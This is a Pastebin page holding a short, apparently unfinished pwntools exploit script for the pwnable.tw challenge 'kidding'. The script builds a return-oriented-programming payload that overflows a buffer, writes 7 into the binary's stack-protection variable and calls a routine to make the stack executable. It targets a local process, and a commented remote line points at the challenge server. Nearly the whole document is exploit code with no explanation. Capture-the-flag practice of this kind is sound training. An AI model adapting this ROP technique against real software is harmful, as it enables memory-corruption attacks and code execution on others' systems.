Advertisement
Guest User

Untitled

a guest
Oct 21st, 2019
167
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.69 KB | None | 0 0
  1. from pwn import *
  2.  
  3. local = True
  4.  
  5. if local:
  6.     r = process("./kidding")
  7. else:
  8.     # nc chall.pwnable.tw 10303
  9.     r = remote("chall.pwnable.tw", 10303)
  10.  
  11. padding = "a"*0x10
  12.  
  13. libc_stack_end = 0x080e9fc8
  14. stack_prot = 0x080e9fec
  15. stack_executable = 0x0809a080
  16.  
  17.  
  18. # 0x080b8536 : pop eax ; ret
  19. pop_eax_ret = 0x080b8536
  20. # 0x0805462b : mov dword ptr [edx], eax ; ret
  21. mov_ret = 0x0805462b
  22. # 0x0806ec8b : pop edx ; ret
  23. pop_edx_ret = 0x0806ec8b
  24.  
  25. payload = padding + p32(pop_eax_ret) + p32(7)
  26. payload += p32(pop_edx_ret) + p32(stack_prot)
  27. payload += p32(mov_ret)
  28. payload += p32(pop_eax_ret) + p32(libc_stack_end)
  29. payload += p32(stack_executable) + p32(0x61616161)
  30.  
  31. gdb.attach(r)
  32.  
  33. r.sendline(payload)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement